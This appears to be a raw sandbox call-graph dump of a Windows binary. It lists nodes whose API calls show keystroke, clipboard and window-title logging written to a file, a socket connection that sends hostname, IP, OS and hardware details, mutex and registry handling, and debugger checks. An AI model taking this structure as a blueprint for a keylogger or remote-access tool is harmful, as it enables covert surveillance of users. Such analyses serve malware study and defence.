3f41071 11074->11168 11167 3f41a39 HeapDestroy 11075->11167 11080 3f40fc1 __RTC_Initialize 11085 3f40fc5 11080->11085 11088 3f40fd1 GetCommandLineA 11080->11088 11081->11048 11083 3f410c2 11082->11083 11084 3f410d9 11082->11084 11089 3f410c9 GetCurrentThreadId 11083->11089 11172 3f3f639 11084->11172 11127 3f41a39 HeapDestroy 11085->11127 11128 3f4817f GetEnvironmentStringsW 11088->11128 11089->11081 11090 3f40fca 11090->11081 11095 3f40fef __mtterm 11095->11085 11098 3f4101f __ioterm 11098->11095 11099 3f40fff __setenvp 11099->11098 11100 3f41008 11099->11100 11161 3f41af9 11100->11161 11102 3f4100f 11102->11090 11102->11098 11104 3f3e489 11103->11104 11105 3f3e4af 11103->11105 11104->11105 11106 3f3e491 CreateThread WaitForSingleObject 11104->11106 11105->11052 11105->11053 11106->11105 11227 3f3df10 11106->11227 11107->11068 11109 3f44031 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 11108->11109 11110 3f44028 __mtterm 11108->11110 11111 3f4407b TlsAlloc 11109->11111 11110->11080 11113 3f440c9 TlsSetValue 11111->11113 11114 3f4418a 11111->11114 11113->11114 11115 3f440da 11113->11115 11114->11080 11188 3f41aa2 11115->11188 11118 3f4411e 11119 3f44185 __mtterm 11118->11119 11120 3f44122 DecodePointer 11118->11120 11119->11114 11121 3f44137 11120->11121 11121->11119 11122 3f44141 __calloc_crt 11121->11122 11122->11119 11123 3f44155 DecodePointer 11122->11123 11124 3f44166 11123->11124 11124->11119 11125 3f4416a 11124->11125 11126 3f44172 GetCurrentThreadId 11125->11126 11126->11114 11127->11090 11130 3f4819b WideCharToMultiByte 11128->11130 11134 3f40fe1 11128->11134 11131 3f481d0 __malloc_crt 11130->11131 11132 3f48208 FreeEnvironmentStringsW 11130->11132 11131->11132 11133 3f481de WideCharToMultiByte 11131->11133 11132->11134 11135 3f481f0 11133->11135 11136 3f481fc FreeEnvironmentStringsW 11133->11136 11139 3f47bb6 GetStartupInfoW __calloc_crt 11134->11139 11137 3f3f639 _free 3 API calls 11135->11137 11136->11134 11138 3f481f8 11137->11138 11138->11136 11143 3f47be4 11139->11143 11150 3f40feb 11139->11150 11140 3f47d49 11141 3f47d7f GetStdHandle 11140->11141 11144 3f47de3 SetHandleCount 11140->11144 11145 3f47d91 GetFileType 11140->11145 11149 3f47db7 InitializeCriticalSectionAndSpinCount 11140->11149 11141->11140 11142 3f47c6b __calloc_crt 11142->11143 11146 3f47cc9 11142->11146 11143->11140 11143->11142 11143->11146 11144->11150 11145->11140 11146->11140 11147 3f47cf5 GetFileType 11146->11147 11148 3f47d00 InitializeCriticalSectionAndSpinCount 11146->11148 11147->11146 11147->11148 11148->11146 11148->11150 11149->11140 11149->11150 11150->11095 11151 3f480c4 11150->11151 11152 3f480de GetModuleFileNameA 11151->11152 11153 3f480d9 ___initmbctable 11151->11153 11154 3f48105 11152->11154 11153->11152 11193 3f47f2a 11154->11193 11157 3f48141 __malloc_crt 11158 3f4814e 11157->11158 11160 3f40ffb 11157->11160 11159 3f47f2a _parse_cmdline _LocaleUpdate::_LocaleUpdate 11158->11159 11159->11160 11160->11098 11160->11099 11163 3f41b07 __IsNonwritableInCurrentImage 11161->11163 11204 3f49086 11163->11204 11164 3f41b25 __initterm_e 11166 3f41b46 __IsNonwritableInCurrentImage 11164->11166 11207 3f3fbf7 11164->11207 11166->11102 11167->11074 11169 3f41084 11168->11169 11170 3f41076 11168->11170 11169->11081 11170->11169 11171 3f4107f __mtterm 11170->11171 11171->11169 11173 3f3f66d __dosmaperr 11172->11173 11174 3f3f644 RtlFreeHeap 11172->11174 11173->11081 11174->11173 11175 3f3f659 11174->11175 11225 3f3f91b __getptd_noexit 11175->11225 11179 3f43fb4 11178->11179 11180 3f43fff 11178->11180 11181 3f43fe1 DecodePointer 11179->11181 11182 3f43fba TlsGetValue 11179->11182 11183 3f44012 11180->11183 11184 3f44009 TlsSetValue 11180->11184 11187 3f43ff7 __freefls 11181->11187 11185 3f43fdd 11182->11185 11186 3f43fcd TlsGetValue 11182->11186 11183->11081 11184->11183 11185->11181 11186->11185 11187->11180 11189 3f41aaa __init_pointers __initp_misc_winsig 11188->11189 11192 3f49066 EncodePointer 11189->11192 11191 3f41ad0 EncodePointer EncodePointer EncodePointer EncodePointer 11191->11118 11192->11191 11195 3f47f49 11193->11195 11197 3f47fb6 11195->11197 11199 3f4b3b1 11195->11199 11196 3f480b4 11196->11157 11196->11160 11197->11196 11198 3f4b3b1 _LocaleUpdate::_LocaleUpdate _parse_cmdline 11197->11198 11198->11197 11202 3f4b35e _LocaleUpdate::_LocaleUpdate 11199->11202 11203 3f4b381 11202->11203 11203->11195 11205 3f4908c EncodePointer 11204->11205 11205->11205 11206 3f490a6 11205->11206 11206->11164 11210 3f3fbbb 11207->11210 11209 3f3fc04 11209->11166 11211 3f3fbc7 ___BuildCatchObject 11210->11211 11216 3f41a90 __lock 11211->11216 11213 3f3fbcc 11217 3f3fad4 DecodePointer DecodePointer 11213->11217 11215 3f3fbd8 __cinit ___BuildCatchObject 11215->11209 11216->11213 11218 3f3fb83 11217->11218 11219 3f3fb02 11217->11219 11218->11215 11219->11218 11220 3f3fb66 EncodePointer EncodePointer 11219->11220 11221 3f3fb2f __realloc_crt 11219->11221 11222 3f3fb3e 11219->11222 11220->11218 11221->11222 11223 3f3fb54 EncodePointer 11221->11223 11222->11218 11224 3f3fb45 __realloc_crt 11222->11224 11223->11220 11224->11218 11224->11223 11226 3f3f65f GetLastError 11225->11226 11226->11173 11228 3f40542 11227->11228 11229 3f3df5a Sleep 11228->11229 11230 3f3df97 11229->11230 11231 3f3df74 11229->11231 11233 3f3dfa4 GetLocalTime wsprintfW SetUnhandledExceptionFilter 11230->11233 11232 3f3f707 31 API calls 11231->11232 11234 3f3df7b 11232->11234 11265 3f3fa29 11233->11265 11236 3f3fa29 208 API calls 11234->11236 11238 3f3df8d CloseHandle 11236->11238 11238->11230 11240 3f3e014 11241 3f3f707 31 API calls 11240->11241 11242 3f3e036 11241->11242 11248 3f3e04e 11242->11248 11292 3f39730 CreateEventW 11242->11292 11244 3f3f876 12 API calls 11244->11248 11245 3f3e189 EnumWindows 11246 3f3e1a5 Sleep EnumWindows 11245->11246 11245->11248 11246->11246 11246->11248 11247 3f3e1f0 Sleep 11247->11248 11248->11244 11248->11245 11248->11247 11249 3f3e239 CreateEventA 11248->11249 11312 3f32da0 ResetEvent InterlockedExchange timeGetTime socket 11248->11312 11333 3f3f876 11249->11333 11252 3f3e2bf Sleep RegOpenKeyExW 11253 3f3e2f5 RegQueryValueExW 11252->11253 11255 3f3e281 11252->11255 11253->11255 11255->11252 11256 3f3e339 11255->11256 11258 3f3fa29 208 API calls 11255->11258 11259 3f3e39f Sleep 11255->11259 11342 3f3ca70 RegOpenKeyExW 11255->11342 11352 3f35430 11255->11352 11257 3f3e345 CloseHandle 11256->11257 11260 3f3e422 WaitForSingleObject CloseHandle 11256->11260 11261 3f3e43c Sleep CloseHandle 11256->11261 11262 3f3e3dd Sleep CloseHandle 11256->11262 11263 3f3e3cd WaitForSingleObject CloseHandle 11256->11263 11257->11248 11258->11255 11259->11255 11259->11256 11260->11256 11261->11248 11262->11248 11263->11262 11266 3f3fa39 11265->11266 11267 3f3fa4d ___set_flsgetvalue __calloc_crt 11265->11267 11268 3f3f91b __controlfp_s __getptd_noexit 11266->11268 11269 3f3fab0 11267->11269 11270 3f3fa67 __getptd 11267->11270 11271 3f3fa3e 11268->11271 11273 3f3f639 _free 3 API calls 11269->11273 11272 3f3fa75 11270->11272 11417 3f420e2 11271->11417 11276 3f3fa8e CreateThread 11272->11276 11275 3f3fab6 11273->11275 11277 3f3e003 CloseHandle 11275->11277 11420 3f3f941 11275->11420 11276->11277 11279 3f3faa8 GetLastError 11276->11279 11451 3f3f9c4 ___set_flsgetvalue 11276->11451 11280 3f3f707 11277->11280 11279->11269 11282 3f3f711 11280->11282 11283 3f3f72b 11282->11283 11285 3f3f72d 11282->11285 11702 3f3f673 11282->11702 11719 3f41f30 DecodePointer 11282->11719 11283->11240 11286 3f3f740 std::exception::exception 11285->11286 11287 3f3f76c std::exception::exception 11285->11287 11288 3f3fbf7 __cinit 8 API calls 11286->11288 11721 3f41215 11287->11721 11290 3f3f76b 11288->11290 11290->11287 11291 3f3f786 11293 3f39791 11292->11293 11294 3f39787 11292->11294 11744 3f3cd00 HeapCreate 11293->11744 11750 3f31280 11294->11750 11298 3f39820 11300 3f31280 2 API calls 11298->11300 11299 3f3982a CreateEventW 11301 3f39863 11299->11301 11302 3f3986d CreateEventW 11299->11302 11300->11299 11303 3f31280 2 API calls 11301->11303 11304 3f39892 CreateEventW 11302->11304 11305 3f39888 11302->11305 11303->11302 11307 3f398ad 11304->11307 11309 3f398b7 11304->11309 11306 3f31280 2 API calls 11305->11306 11306->11304 11308 3f31280 2 API calls 11307->11308 11308->11309 11310 3f3994a InterlockedExchange timeGetTime CreateEventW CreateEventW 11309->11310 11311 3f399d4 11310->11311 11311->11248 11313 3f32e08 11312->11313 11314 3f32e1c lstrlenW WideCharToMultiByte 11312->11314 11316 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11313->11316 11753 3f3eff4 11314->11753 11318 3f32e16 11316->11318 11317 3f32e42 lstrlenW WideCharToMultiByte gethostbyname 11319 3f32e79 moneypunct 11317->11319 11318->11248 11320 3f32e80 htons connect 11319->11320 11321 3f32eb6 11319->11321 11320->11321 11322 3f32ecb setsockopt setsockopt setsockopt setsockopt 11320->11322 11323 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11321->11323 11325 3f32f72 InterlockedExchange 11322->11325 11326 3f32f44 WSAIoctl 11322->11326 11324 3f32ec5 11323->11324 11324->11248 11327 3f3fa29 208 API calls 11325->11327 11326->11325 11328 3f32f99 11327->11328 11329 3f3fa29 208 API calls 11328->11329 11330 3f32fb1 11329->11330 11331 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11330->11331 11332 3f32fc6 11331->11332 11332->11248 11334 3f3f884 11333->11334 11335 3f3f88b 11333->11335 11334->11335 11340 3f3f8ac 11334->11340 11336 3f3f91b __controlfp_s __getptd_noexit 11335->11336 11337 3f3f890 11336->11337 11338 3f420e2 __controlfp_s 11 API calls 11337->11338 11339 3f3f89a 11338->11339 11339->11255 11340->11339 11341 3f3f91b __controlfp_s __getptd_noexit 11340->11341 11341->11337 11343 3f3cc89 11342->11343 11344 3f3cabf RegQueryInfoKeyW 11342->11344 11343->11255 11344->11343 11350 3f3caee _memset 11344->11350 11345 3f3cc70 11346 3f3cc7c RegCloseKey 11345->11346 11346->11343 11347 3f3cb58 RegEnumValueW 11347->11350 11349 3f3f707 31 API calls 11349->11350 11350->11345 11350->11347 11350->11349 11351 3f3cf20 34 API calls 11350->11351 11754 3f3d3b0 11350->11754 11351->11350 11353 3f3f707 31 API calls 11352->11353 11354 3f3545f _memset 11353->11354 11355 3f3549a gethostname gethostbyname 11354->11355 11356 3f354bd inet_ntoa 11355->11356 11357 3f3555c 7 API calls 11355->11357 11897 3f403cf 11356->11897 11801 3f37490 LoadLibraryW 11357->11801 11362 3f403cf _strcat_s 12 API calls 11372 3f354f6 11362->11372 11366 3f35510 inet_ntoa 11368 3f403cf _strcat_s 12 API calls 11366->11368 11368->11372 11369 3f356b2 lstrlenW 11373 3f36d70 9 API calls 11369->11373 11370 3f3569f GetWindowTextW 11370->11369 11372->11357 11372->11366 11374 3f403cf _strcat_s 12 API calls 11372->11374 11375 3f356ea 11373->11375 11374->11372 11376 3f356ff 11375->11376 11377 3f3f876 12 API calls 11375->11377 11378 3f3f876 12 API calls 11376->11378 11377->11376 11379 3f35715 lstrlenW 11378->11379 11381 3f36d70 9 API calls 11379->11381 11382 3f35750 11381->11382 11383 3f35768 GetModuleHandleW GetProcAddress 11382->11383 11384 3f3f876 12 API calls 11382->11384 11385 3f357c6 GetSystemInfo 11383->11385 11386 3f357bb GetNativeSystemInfo 11383->11386 11387 3f35765 11384->11387 11388 3f357d3 wsprintfW 11385->11388 11386->11388 11387->11383 11833 3f36a70 11388->11833 11392 3f35822 OpenProcess 11393 3f35885 11392->11393 11395 3f3583e GetProcessImageFileNameW 11392->11395 11854 3f36690 CoInitialize CoCreateInstance 11393->11854 11397 3f3585e 11395->11397 11400 3f35855 CloseHandle 11395->11400 11396 3f3588a 11401 3f3f876 12 API calls 11396->11401 11906 3f380f0 11397->11906 11400->11393 11402 3f358b1 11401->11402 11859 3f36490 11402->11859 11404 3f358c9 11876 3f36150 11404->11876 11406 3f358d4 11407 3f358e6 GetTickCount __time64 11406->11407 11892 3f403a8 11407->11892 11410 3f359a3 11411 3f35a30 36 API calls 11410->11411 11412 3f359fb 11411->11412 11416 3f33160 18 API calls 11412->11416 11413 3f35a11 moneypunct 11414 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11413->11414 11415 3f35a2b 11414->11415 11415->11255 11416->11413 11425 3f420b5 DecodePointer 11417->11425 11449 3f3f92e __getptd_noexit 11420->11449 11422 3f3f94c __dosmaperr 11423 3f3f91b __controlfp_s __getptd_noexit 11422->11423 11424 3f3f95f 11423->11424 11424->11277 11426 3f420ca 11425->11426 11431 3f42090 11426->11431 11428 3f420e1 11429 3f420b5 __controlfp_s 10 API calls 11428->11429 11430 3f420ee 11429->11430 11430->11277 11434 3f41f67 11431->11434 11435 3f41f86 _memset __call_reportfault 11434->11435 11436 3f41fa4 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11435->11436 11437 3f42072 __call_reportfault 11436->11437 11440 3f3f00a 11437->11440 11439 3f4208e GetCurrentProcess TerminateProcess 11439->11428 11441 3f3f012 11440->11441 11442 3f3f014 IsDebuggerPresent 11440->11442 11441->11439 11448 3f482fd 11442->11448 11445 3f4132e SetUnhandledExceptionFilter UnhandledExceptionFilter 11446 3f41353 GetCurrentProcess TerminateProcess 11445->11446 11447 3f4134b __call_reportfault 11445->11447 11446->11439 11447->11446 11448->11445 11450 3f3f937 11449->11450 11450->11422 11452 3f43c9a 11451->11452 11453 3f3f9d4 ___fls_getvalue 11452->11453 11454 3f3fa08 __freefls 11453->11454 11455 3f3f9de 11453->11455 11456 3f3fa23 11454->11456 11457 3f3f9e7 ___fls_setvalue 11455->11457 11462 3f3f983 11456->11462 11459 3f3f9f1 GetLastError ExitThread 11457->11459 11460 3f3f9fe GetCurrentThreadId 11457->11460 11460->11456 11473 3f44300 11462->11473 11464 3f3f98f __getptd 11474 3f35f40 CreateMutexW GetLastError 11464->11474 11490 3f32fd0 11464->11490 11501 3f330e0 11464->11501 11465 3f3f99e 11507 3f3f964 __getptd_noexit 11465->11507 11467 3f3f9a4 11468 3f4418f __XcptFilter __getptd_noexit 11467->11468 11469 3f3f9b5 11468->11469 11473->11464 11475 3f35f7d 11474->11475 11487 3f35f9b _memset 11474->11487 11476 3f35f80 Sleep CreateMutexW GetLastError 11475->11476 11476->11476 11476->11487 11477 3f36003 GetModuleHandleW GetConsoleWindow 11478 3f36028 11477->11478 11480 3f36048 11478->11480 11481 3f3602f 11478->11481 11479 3f35fbe lstrlenW 11512 3f36d70 11479->11512 11522 3f3e850 11480->11522 11482 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11481->11482 11485 3f36042 11482->11485 11485->11465 11487->11477 11487->11479 11488 3f35ff3 Sleep 11487->11488 11489 3f35fe3 lstrcmpW 11487->11489 11488->11477 11488->11487 11489->11477 11489->11488 11498 3f32ff3 11490->11498 11491 3f33095 11494 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11491->11494 11492 3f33034 select 11493 3f3308d 11492->11493 11492->11498 11556 3f32d30 11493->11556 11495 3f330b8 11494->11495 11495->11465 11496 3f33052 recv 11496->11498 11498->11491 11498->11492 11498->11493 11498->11496 11499 3f3f91b __getptd_noexit __controlfp_s 11498->11499 11559 3f33360 11498->11559 11499->11498 11502 3f33148 11501->11502 11504 3f330f4 11501->11504 11502->11465 11503 3f33108 Sleep 11503->11504 11504->11502 11504->11503 11506 3f33160 18 API calls 11504->11506 11505 3f33124 timeGetTime 11505->11504 11506->11505 11508 3f3f972 11507->11508 11509 3f3f979 ExitThread 11507->11509 11510 3f43fa6 __freeptd 5 API calls 11508->11510 11511 3f3f978 11510->11511 11511->11509 11545 3f46770 11512->11545 11515 3f36e12 11516 3f36e21 RegQueryValueExW 11515->11516 11517 3f36e06 11515->11517 11516->11517 11518 3f36e54 lstrcmpW 11516->11518 11520 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11517->11520 11518->11517 11519 3f36e6a lstrcpyW 11518->11519 11519->11517 11521 3f36eb8 11520->11521 11521->11487 11542 3f3e85d _memset 11522->11542 11523 3f3e8b1 Sleep GetTickCount 11524 3f3e8d2 GetTickCount InterlockedExchange OpenClipboard GetClipboardData 11523->11524 11523->11542 11525 3f3e9b2 CloseClipboard 11524->11525 11526 3f3e8fa GlobalSize GlobalLock 11524->11526 11525->11542 11528 3f3e9ab GlobalUnlock 11526->11528 11538 3f3e91c _memset 11526->11538 11528->11525 11529 3f3e9c1 WaitForSingleObject CreateFileW 11530 3f3e9f1 SetFilePointer lstrlenW WriteFile CloseHandle ReleaseMutex 11529->11530 11529->11542 11530->11542 11531 3f3ec0a lstrlenW 11531->11523 11532 3f3ec19 WaitForSingleObject CreateFileW 11531->11532 11533 3f3ec48 SetFilePointer lstrlenW WriteFile CloseHandle ReleaseMutex 11532->11533 11532->11542 11533->11542 11534 3f3e975 wsprintfW 11534->11538 11535 3f3eaba GetKeyState 11535->11542 11536 3f3ebb1 wsprintfW 11536->11542 11537 3f3eb87 wsprintfW 11537->11542 11538->11528 11538->11534 11539 3f3eb04 lstrlenW 11539->11542 11540 3f3eb71 wsprintfW 11540->11542 11541 3f3eb5a lstrlenW 11541->11542 11542->11523 11542->11529 11542->11531 11542->11535 11542->11536 11542->11537 11542->11539 11542->11540 11542->11541 11543 3f3eb37 lstrlenW 11542->11543 11544 3f3eb16 wsprintfW 11542->11544 11547 3f3e730 11542->11547 11543->11542 11544->11542 11546 3f36dde RegOpenKeyExW 11545->11546 11546->11515 11546->11517 11548 3f46770 _memset 11547->11548 11549 3f3e756 GetForegroundWindow GetWindowTextW 11548->11549 11550 3f3e792 _memset 11549->11550 11551 3f3e7a7 lstrlenW 11550->11551 11555 3f3e815 _memset 11550->11555 11552 3f3e7b6 GetLocalTime wsprintfW 11551->11552 11551->11555 11552->11555 11553 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11554 3f3e847 11553->11554 11554->11542 11555->11553 11557 3f32d41 setsockopt CancelIo InterlockedExchange closesocket SetEvent 11556->11557 11558 3f32d90 11556->11558 11557->11558 11558->11491 11560 3f33376 11559->11560 11574 3f31100 11560->11574 11562 3f334f1 11562->11498 11563 3f334d6 11564 3f311b0 11 API calls 11563->11564 11565 3f334e8 11564->11565 11565->11498 11566 3f33413 timeGetTime 11582 3f311b0 11566->11582 11569 3f33388 _memmove 11569->11562 11569->11563 11569->11566 11570 3f311b0 11 API calls 11569->11570 11591 3f31060 11569->11591 11595 3f3ad10 11569->11595 11626 3f3ada4 11569->11626 11630 3f3b836 11569->11630 11570->11569 11575 3f3110b 11574->11575 11576 3f31111 11574->11576 11575->11569 11633 3f3f390 11576->11633 11578 3f31134 VirtualAlloc 11579 3f3116f 11578->11579 11580 3f3118a VirtualFree 11579->11580 11581 3f31198 11579->11581 11580->11581 11581->11569 11583 3f311bd 11582->11583 11584 3f311c6 11583->11584 11585 3f3f390 __floor_pentium4 9 API calls 11583->11585 11584->11569 11586 3f311ee 11585->11586 11587 3f31214 11586->11587 11588 3f3121b VirtualAlloc 11586->11588 11587->11569 11589 3f31236 11588->11589 11590 3f31247 VirtualFree 11589->11590 11590->11569 11592 3f31071 11591->11592 11593 3f31100 11 API calls 11592->11593 11594 3f31081 11593->11594 11594->11569 11596 3f3ad79 11595->11596 11597 3f3ad2d RegOpenKeyExW 11595->11597 11598 3f3b845 11596->11598 11600 3f3afe3 11596->11600 11601 3f3adea 11596->11601 11597->11596 11599 3f3ad5d RegQueryValueExW 11597->11599 11598->11569 11599->11596 11602 3f3f707 31 API calls 11600->11602 11601->11598 11603 3f3f707 31 API calls 11601->11603 11606 3f3afed _memset 11602->11606 11604 3f3ae01 _memset 11603->11604 11605 3f3ae2b wsprintfW 11604->11605 11610 3f3ae42 11604->11610 11605->11610 11607 3f3f707 31 API calls 11606->11607 11608 3f3b047 11607->11608 11644 3f3cf20 11608->11644 11612 3f3afae 11610->11612 11617 3f3ae9a moneypunct _memmove 11610->11617 11611 3f3b080 11616 3f3b0d4 RegCreateKeyW 11611->11616 11620 3f3b15f 11611->11620 11614 3f3fa29 199 API calls 11612->11614 11613 3f3fa29 199 API calls 11615 3f3b179 CloseHandle 11613->11615 11618 3f3afc3 CloseHandle 11614->11618 11615->11569 11619 3f3b14a RegCloseKey 11616->11619 11622 3f3b0f0 11616->11622 11617->11569 11621 3f3afd7 moneypunct 11618->11621 11619->11620 11620->11613 11621->11569 11651 3f35a30 11622->11651 11625 3f3b141 11625->11619 11627 3f3ade1 11626->11627 11628 3f3adce 11626->11628 11627->11569 11677 3f33160 GetCurrentThreadId 11628->11677 11692 3f3bb00 11630->11692 11632 3f3b83c 11632->11569 11634 3f3f39d 11633->11634 11636 3f41756 __ctrlfp __floor_pentium4 11633->11636 11635 3f3f3ce 11634->11635 11634->11636 11637 3f3f418 11635->11637 11639 3f3f429 ___libm_error_support 11635->11639 11638 3f417c4 __floor_pentium4 11636->11638 11640 3f417a1 11636->11640 11642 3f417b1 __ctrlfp 11636->11642 11637->11578 11641 3f48997 __except1 8 API calls 11638->11641 11638->11642 11639->11637 11643 3f48942 __floor_pentium4 __getptd_noexit 11640->11643 11641->11642 11642->11578 11643->11642 11645 3f3cf6b 11644->11645 11646 3f3cf2c 11644->11646 11648 3f3d100 34 API calls 11645->11648 11650 3f3cf48 11645->11650 11646->11645 11647 3f3cf36 11646->11647 11649 3f3d100 34 API calls 11647->11649 11647->11650 11648->11650 11649->11650 11650->11611 11652 3f35ab0 11651->11652 11652->11652 11653 3f38300 std::exception::exception std::exception::exception RaiseException 11652->11653 11654 3f35ac9 11653->11654 11655 3f38300 std::exception::exception std::exception::exception RaiseException 11654->11655 11656 3f35aed 11654->11656 11655->11656 11657 3f35b0f 11656->11657 11658 3f38300 std::exception::exception std::exception::exception RaiseException 11656->11658 11659 3f38300 std::exception::exception std::exception::exception RaiseException 11657->11659 11660 3f35b39 11657->11660 11658->11657 11659->11660 11662 3f38300 std::exception::exception std::exception::exception RaiseException 11660->11662 11663 3f35b69 11660->11663 11661 3f35bc9 11664 3f38740 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11661->11664 11662->11663 11665 3f38300 std::exception::exception std::exception::exception RaiseException 11663->11665 11666 3f35b99 11663->11666 11668 3f35c24 11664->11668 11665->11666 11666->11661 11667 3f38300 std::exception::exception std::exception::exception RaiseException 11666->11667 11667->11661 11669 3f390d0 34 API calls 11668->11669 11670 3f35c2e MultiByteToWideChar 11669->11670 11672 3f35c59 11670->11672 11673 3f35c5c MultiByteToWideChar 11670->11673 11672->11673 11674 3f35c72 moneypunct 11673->11674 11675 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11674->11675 11676 3f35cb9 RegDeleteValueW RegSetValueExW 11675->11676 11676->11619 11676->11625 11678 3f3318e 11677->11678 11679 3f33178 11677->11679 11681 3f31100 11 API calls 11678->11681 11680 3f33180 InterlockedExchange 11679->11680 11680->11678 11680->11680 11682 3f331af 11681->11682 11683 3f31100 11 API calls 11682->11683 11684 3f331d6 11683->11684 11685 3f31060 11 API calls 11684->11685 11686 3f33205 11685->11686 11687 3f33260 send send 11686->11687 11688 3f3321f 11687->11688 11689 3f311b0 11 API calls 11688->11689 11690 3f3322f GetCurrentThreadId 11689->11690 11691 3f3323f 11690->11691 11691->11627 11693 3f3f707 31 API calls 11692->11693 11694 3f3bb13 _memset 11693->11694 11695 3f3bb26 GetLastInputInfo GetTickCount wsprintfW GetForegroundWindow 11694->11695 11696 3f3bb89 11695->11696 11697 3f3bb79 GetWindowTextW 11695->11697 11698 3f3bc70 94 API calls 11696->11698 11697->11696 11699 3f3bba6 11698->11699 11700 3f3bbbe moneypunct 11699->11700 11701 3f33160 18 API calls 11699->11701 11700->11632 11701->11700 11703 3f3f6f0 11702->11703 11716 3f3f681 11702->11716 11704 3f41f30 _malloc DecodePointer 11703->11704 11705 3f3f6f6 11704->11705 11708 3f3f91b __controlfp_s __getptd_noexit 11705->11708 11706 3f3f68c 11706->11716 11724 3f41ee8 11706->11724 11712 3f3f6e8 11708->11712 11710 3f3f6af RtlAllocateHeap 11710->11712 11710->11716 11712->11282 11713 3f3f6dc 11715 3f3f91b __controlfp_s __getptd_noexit 11713->11715 11714 3f41f30 _malloc DecodePointer 11714->11716 11717 3f3f6da 11715->11717 11716->11706 11716->11710 11716->11713 11716->11714 11716->11717 11718 3f3f91b __controlfp_s __getptd_noexit 11717->11718 11718->11712 11720 3f41f45 11719->11720 11720->11282 11722 3f4123e 11721->11722 11723 3f4124a RaiseException 11721->11723 11722->11723 11723->11291 11734 3f49383 11724->11734 11726 3f41eef 11727 3f41f0a __NMSG_WRITE __NMSG_WRITE 11726->11727 11729 3f49383 __FF_MSGBANNER 12 API calls 11726->11729 11728 3f3f691 __NMSG_WRITE 11727->11728 11731 3f41a78 11728->11731 11730 3f41efc 11729->11730 11730->11727 11730->11728 11741 3f41a4d GetModuleHandleW 11731->11741 11735 3f4938f 11734->11735 11736 3f3f91b __controlfp_s __getptd_noexit 11735->11736 11737 3f49399 11735->11737 11738 3f493b2 11736->11738 11737->11726 11739 3f420e2 __controlfp_s 11 API calls 11738->11739 11740 3f493bd 11739->11740 11740->11726 11742 3f41a71 ExitProcess 11741->11742 11743 3f41a61 GetProcAddress 11741->11743 11743->11742 11745 3f3cd31 11744->11745 11746 3f3cd27 11744->11746 11748 3f39800 InitializeCriticalSectionAndSpinCount 11745->11748 11749 3f3f639 _free 3 API calls 11745->11749 11747 3f31280 2 API calls 11746->11747 11747->11745 11748->11298 11748->11299 11749->11748 11751 3f41215 __CxxThrowException@8 RaiseException 11750->11751 11752 3f31295 DeleteCriticalSection 11751->11752 11752->11293 11757 3f3d3d0 11754->11757 11758 3f3d3e6 _vwprintf 11757->11758 11759 3f3d3dc 11757->11759 11758->11759 11760 3f31280 2 API calls 11759->11760 11761 3f31280 2 API calls 11759->11761 11764 3f3d3c0 11759->11764 11765 3f3d160 11759->11765 11770 3f407a7 11759->11770 11760->11758 11761->11759 11764->11350 11766 3f3d16f 11765->11766 11769 3f3d181 11766->11769 11773 3f3d260 11766->11773 11769->11759 11786 3f4072e 11770->11786 11772 3f407bf 11772->11759 11774 3f3d27b 11773->11774 11777 3f407f2 11774->11777 11776 3f3d17e 11776->11759 11781 3f407ff 11777->11781 11782 3f40803 _memset 11777->11782 11778 3f40809 11779 3f3f91b __controlfp_s __getptd_noexit 11778->11779 11780 3f4080e 11779->11780 11783 3f420e2 __controlfp_s 11 API calls 11780->11783 11781->11776 11782->11778 11782->11781 11784 3f4084e 11782->11784 11783->11781 11784->11781 11785 3f3f91b __controlfp_s __getptd_noexit 11784->11785 11785->11780 11787 3f4074e 11786->11787 11788 3f40739 11786->11788 11790 3f4075c 11787->11790 11793 3f40769 __vswprintf_helper 11787->11793 11789 3f3f91b __controlfp_s __getptd_noexit 11788->11789 11792 3f4073e 11789->11792 11791 3f3f91b __controlfp_s __getptd_noexit 11790->11791 11796 3f40761 11791->11796 11795 3f420e2 __controlfp_s 11 API calls 11792->11795 11794 3f40787 11793->11794 11797 3f407a1 11794->11797 11799 3f3f91b __controlfp_s __getptd_noexit 11794->11799 11798 3f40749 11795->11798 11800 3f420e2 __controlfp_s 11 API calls 11796->11800 11797->11772 11798->11772 11799->11796 11800->11797 11802 3f35611 GetSystemInfo wsprintfW 11801->11802 11803 3f374ac GetProcAddress 11801->11803 11814 3f36c50 11802->11814 11804 3f374c0 11803->11804 11805 3f37597 FreeLibrary 11803->11805 11925 3f3f858 11804->11925 11805->11802 11807 3f374f4 11928 3f37410 GetModuleHandleW GetProcAddress 11807->11928 11811 3f37582 RegCloseKey 11813 3f37592 11811->11813 11812 3f3756d 11812->11811 11813->11805 11815 3f36c73 GetDriveTypeW 11814->11815 11816 3f36cd0 11815->11816 11817 3f36c96 GetDiskFreeSpaceExW 11815->11817 11816->11815 11818 3f36cd6 _memset 11816->11818 11817->11816 11819 3f36ce6 GlobalMemoryStatusEx 11818->11819 11820 3f3f858 swprintf 13 API calls 11819->11820 11821 3f36d3e 11820->11821 11822 3f3f858 swprintf 13 API calls 11821->11822 11823 3f36d51 11822->11823 11824 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11823->11824 11825 3f3567d 